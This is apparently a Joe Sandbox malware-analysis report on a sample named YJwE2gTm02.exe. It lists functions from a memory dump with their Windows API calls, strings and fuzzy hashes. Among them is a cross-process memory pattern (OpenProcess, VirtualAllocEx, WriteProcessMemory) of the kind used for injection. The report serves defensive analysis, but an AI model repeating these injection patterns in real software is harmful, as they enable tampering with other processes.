Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7f6b48899b3ba3f056475418c5c06eeabb468536fb14d5b1dead7d2b8f430e10
Instruction ID: 89190053ad0bbab8e628166cbfb3a90d9af814f7690c8f65d23c859b857cd9d5
Opcode Fuzzy Hash: 7f6b48899b3ba3f056475418c5c06eeabb468536fb14d5b1dead7d2b8f430e10
Instruction Fuzzy Hash: 28018C75C09A2DDBCF10AFE8DC59AEDBB78FF08710F000546E502B2240CB349550DBA5

Function 009610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00961114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 0096112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096114D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 182a29454cd3b18d9246aaf51216e1f10d6afb828f7436a5b78339bcd58d855e
Instruction ID: c9a1fe771499ee7ba82ec5087d118334066c59b6767b451455b627b61d184739
Opcode Fuzzy Hash: 182a29454cd3b18d9246aaf51216e1f10d6afb828f7436a5b78339bcd58d855e
Instruction Fuzzy Hash: 06013CB5214205BFDF114FA9DC49E6A3F6EEF8A3A0B65441AFA45D7360DB31DC00AA70

Function 00960FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00960FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00960FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00960FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00960FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00961002

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9771d8c33acd74c91c28d38513d6b3892f124826e47218e0e736fe702d5de33b
Instruction ID: c75367525b4299db8b768899f210fd27c040375091b6637e427c756a614acb0b
Opcode Fuzzy Hash: 9771d8c33acd74c91c28d38513d6b3892f124826e47218e0e736fe702d5de33b
Instruction Fuzzy Hash: 61F06DB5214301EBDF214FA8DC4DF5A3BADEF897A2F644416FA45C7261CA70DC409A70

Function 00961014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0096102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00961036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00961045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0096104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00961062

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 865f5b48a05a4978efb7dce6e04fccff5efcf0b1bac377c2a70b83987706faf2
Instruction ID: 1c1f26cac7cc9ca5f63be1dd6811c9a4711134a0ad75e97c1c7893de5904d249
Opcode Fuzzy Hash: 865f5b48a05a4978efb7dce6e04fccff5efcf0b1bac377c2a70b83987706faf2
Instruction Fuzzy Hash: 0EF06DB5214311EBDF215FA8ED49F5A3BADEF89761F240416FA45C7260CA70D8409AB0

Function 0097030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 00970324
CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 00970331
CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 0097033E
CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 0097034B
CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 00970358
CloseHandle.KERNEL32(?,?,?,?,0097017D,?,009732FC,?,00000001,00942592,?), ref: 00970365

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 12251c06257f0379517cf079261a3e9966e9d48252f4c6739a91c451f0c307c5
Instruction ID: e302f919ba1e1e429bf09032db7f5b0a3966ccca3ba89285693a477a70de8316
Opcode Fuzzy Hash: 12251c06257f0379517cf079261a3e9966e9d48252f4c6739a91c451f0c307c5
Instruction Fuzzy Hash: EC019C72800B15DFCB30AF66D880812FBF9BEA02153158A3FD1AA52931C3B1A958DE80

Function 0093D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0093D752

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 0093D764
_free.LIBCMT ref: 0093D776
_free.LIBCMT ref: 0093D788
_free.LIBCMT ref: 0093D79A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 657c94e8336edc9e808d14c8b5f73d6661b88922e4d46e44229e66a4f7184e63
Instruction ID: 527f0dba5c289f2099b504b09dd551b5ff5013a0bb697078611eb8100802ec12
Opcode Fuzzy Hash: 657c94e8336edc9e808d14c8b5f73d6661b88922e4d46e44229e66a4f7184e63
Instruction Fuzzy Hash: 61F036F2955214AB8625EB64FAC6E177BDDBB44710F940C45F04DD7602C730FC808E64

Function 00965C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00965C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00965C6F
MessageBeep.USER32(00000000), ref: 00965C87
KillTimer.USER32(?,0000040A), ref: 00965CA3
EndDialog.USER32(?,00000001), ref: 00965CBD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 6e31326e38bac25c79471850ee55632f6e6f4764799a113c4de820b29a96243f
Instruction ID: 0bfe2776eb36131b3f1cfc0ae8d670d10bac4922db80c2c2dbc35c899fd1c6da
Opcode Fuzzy Hash: 6e31326e38bac25c79471850ee55632f6e6f4764799a113c4de820b29a96243f
Instruction Fuzzy Hash: 7A01A470514B04AFEB205B14DD4EFA67BBCBF00B05F01055AB5C3A10E1DBF8A984DB90

Function 009322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009322BE

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 009322D0
_free.LIBCMT ref: 009322E3
_free.LIBCMT ref: 009322F4
_free.LIBCMT ref: 00932305

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4c828f33e4dd750da8de1ed4d484162a785c48d71514bde0825d42505f9cc7d3
Instruction ID: 897a22a8b00b4968c201691c667f7dc669da7405aa661457625f2600ee8ed6b3
Opcode Fuzzy Hash: 4c828f33e4dd750da8de1ed4d484162a785c48d71514bde0825d42505f9cc7d3
Instruction Fuzzy Hash: BCF05EB98AA2309BC612AF58BD01F0D3FA4F7587A1F11054BF424D22B1C7320892BFE4

Function 009195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009195D4
StrokeAndFillPath.GDI32(?,?,009571F7,00000000,?,?,?), ref: 009195F0
SelectObject.GDI32(?,00000000), ref: 00919603
DeleteObject.GDI32 ref: 00919616
StrokePath.GDI32(?), ref: 00919631

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b09bf4aeb717b4f1e46d8b5dbb2ec9bab364f6defd1ad2dd2d90d918d84f5ecf
Instruction ID: 58a48a092d67abd35c9a5851840c60e2b9e73fca8c2940365d00449b9fa37958
Opcode Fuzzy Hash: b09bf4aeb717b4f1e46d8b5dbb2ec9bab364f6defd1ad2dd2d90d918d84f5ecf
Instruction Fuzzy Hash: A8F0193216E308EBDB225F69FD287A43B65AB013A2F048216F425550F1C73189D1EF24

Function 00930F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 009310F9
__freea.LIBCMT ref: 00931117

Part of subcall function 00931537: _free.LIBCMT ref: 0093154F

Strings

am/pm, xrefs: 0093117A
a/p, xrefs: 009311DE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: ba64b9f7f7f6930a59d1cf48252a341fffa45b15209d829dee8b52e8f24a4fe9
Instruction ID: b5e2b5db9b5f41f6d76bcb9d92049126b6b6183849f74fc68632180209affc03
Opcode Fuzzy Hash: ba64b9f7f7f6930a59d1cf48252a341fffa45b15209d829dee8b52e8f24a4fe9
Instruction Fuzzy Hash: 70D12431904206CBDB289FA8C895BFEB7B9FF46300F284559E911AB671D3799D80CF91

Function 00987B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00920242: EnterCriticalSection.KERNEL32(009D070C,009D1884,?,?,0091198B,009D2518,?,?,?,009012F9,00000000), ref: 0092024D
Part of subcall function 00920242: LeaveCriticalSection.KERNEL32(009D070C,?,0091198B,009D2518,?,?,?,009012F9,00000000), ref: 0092028A

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 009200A3: __onexit.LIBCMT ref: 009200A9

__Init_thread_footer.LIBCMT ref: 00987BFB

Part of subcall function 009201F8: EnterCriticalSection.KERNEL32(009D070C,?,?,00918747,009D2514), ref: 00920202
Part of subcall function 009201F8: LeaveCriticalSection.KERNEL32(009D070C,?,00918747,009D2514), ref: 00920235

Strings

5, xrefs: 00987C78
Variable must be of type 'Object'., xrefs: 00987C3A
G, xrefs: 00987C7F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 0253fb8d12914ae7f2f0d7819fed58ce0632c342100c3b21af246c05917ffcac
Instruction ID: 53d13199048e6772a2c52cee134d5bb675224250c89c936c12b4ff155f75d2c1
Opcode Fuzzy Hash: 0253fb8d12914ae7f2f0d7819fed58ce0632c342100c3b21af246c05917ffcac
Instruction Fuzzy Hash: B3917B71A04209EFCB14EF94D891EADB7B6BF84304F208459F846AB392DB71EE45CB51

Function 00962716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0096B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009621D0,?,?,00000034,00000800,?,00000034), ref: 0096B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00962760

Part of subcall function 0096B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0096B3F8

Part of subcall function 0096B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0096B355
Part of subcall function 0096B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00962194,00000034,?,?,00001004,00000000,00000000), ref: 0096B365
Part of subcall function 0096B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00962194,00000034,?,?,00001004,00000000,00000000), ref: 0096B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009627CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0096281A

Strings

@, xrefs: 00962832

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 226d4afa8c38711465ae5b243f70ad227920238043e808716d6683bb9cde1e91
Instruction ID: 9026f0c9ddd17f21018d423dfed8ae4870666e000193202588d037da3e8c54aa
Opcode Fuzzy Hash: 226d4afa8c38711465ae5b243f70ad227920238043e808716d6683bb9cde1e91
Instruction Fuzzy Hash: 9B413C72900218AFDB10DFA4CD42FEEBBB8AF49300F108055FA55B7191DB706E85DBA0

Function 0093172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\YJwE2gTm02.exe,00000104), ref: 00931769
_free.LIBCMT ref: 00931834
_free.LIBCMT ref: 0093183E

Strings

C:\Users\user\Desktop\YJwE2gTm02.exe, xrefs: 00931760, 00931767, 00931796, 009317CE

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\YJwE2gTm02.exe
API String ID: 2506810119-543201998
Opcode ID: a350f07f278574c9910d336d4544d24fa5c231379c1823baab3134e16897e205
Instruction ID: 642eff32aa7ad38ea65fa18080f78cfe058b7b86236724464d05ca800db9bdeb
Opcode Fuzzy Hash: a350f07f278574c9910d336d4544d24fa5c231379c1823baab3134e16897e205
Instruction Fuzzy Hash: 9A31AB75A44218FBCB21DB999C81E9EBBFCEB85310F1441A7F91597221DA708E80CFA4

Function 0096C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0096C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0096C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009D1990,016753F0), ref: 0096C395

Strings

0, xrefs: 0096C2DF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 91ba87f189d9913e8ce337855277d206738723b936e2aa57523b692137256cee
Instruction ID: 572174c291fef4aaa436f9e9ec9e94a3ba17794e5522569669efdf1b6a29f88b
Opcode Fuzzy Hash: 91ba87f189d9913e8ce337855277d206738723b936e2aa57523b692137256cee
Instruction Fuzzy Hash: 2D41A2B12083019FD720DF29D844F6ABBE8AF85311F148A1EF9A5973D1D730E904CB62

Function 00994416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0099CC08,00000000,?,?,?,?), ref: 009944AA
GetWindowLongW.USER32 ref: 009944C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009944D7

Strings

SysTreeView32, xrefs: 0099447C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ce1d4babffb623aa93a00dbec5907a66b03b39608db50e37741b6e6bdadb8ace
Instruction ID: b61743026b6f10e6a55e26c57714315e1821912f69dbdf8bc0696cac390621a0
Opcode Fuzzy Hash: ce1d4babffb623aa93a00dbec5907a66b03b39608db50e37741b6e6bdadb8ace
Instruction Fuzzy Hash: 8031CD32214205AFDF218E78DC45FEA7BA9EB48338F204719F979921E0D770EC519B60

Function 0098304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0098335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00983077,?,?), ref: 00983378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0098307A
_wcslen.LIBCMT ref: 0098309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00983106

Strings

255.255.255.255, xrefs: 00983095, 0098309A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 8d59d08f99a68ca49fa83c6c11094db67ad5521e2c79ec1587ed7131b08d82e6
Instruction ID: 9d7e7d0c7bf7542cfc19ab8ebf9c07f87db2489447cbd0b9a38145987f50961b
Opcode Fuzzy Hash: 8d59d08f99a68ca49fa83c6c11094db67ad5521e2c79ec1587ed7131b08d82e6
Instruction Fuzzy Hash: 6431F339604201DFCB20EF28C885EAA77E4EF54B18F24C059E8168B392CB76EE41C760

Function 00993EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00993F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00993F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00993F78

Strings

SysMonthCal32, xrefs: 00993F0B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

